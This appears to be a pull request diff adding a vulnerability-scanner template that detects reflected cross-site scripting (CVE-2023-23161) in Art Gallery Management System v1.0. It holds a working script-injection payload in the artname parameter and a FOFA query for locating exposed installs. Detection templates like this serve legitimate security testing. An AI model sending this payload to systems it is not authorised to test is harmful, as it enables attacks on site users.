Merge pull request #7742 from ctflearner/CVE-2023-23161

Create CVE-2023-23161.yaml

http/cves/2023/CVE-2023-23161.yaml

@@ -0,0 +1,50 @@
+id: CVE-2023-23161
+
+info:
+  name: Art Gallery Management System Project v1.0 - Cross-Site Scripting
+  author: ctflearner
+  severity: medium
+  description: |
+    A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.
+  reference:
+    - https://www.exploit-db.com/exploits/51214
+    - https://github.com/rahulpatwari/CVE/blob/main/CVE-2023-23161/CVE-2023-23161.txt
+    - https://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-23161
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-23161
+    cwe-id: CWE-79
+    epss-score: 0.00048
+    cpe: cpe:2.3:a:art_gallery_management_system_project:art_gallery_management_system:1.0:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: title="Art Gallery Management System"
+    vendor: art_gallery_management_system_project
+    product: art_gallery_management_system
+  tags: cve,cve2023,art,gallery,xss
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'center"><img src=1 onerror=alert(document.domain)>'
+          - 'Art Type'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200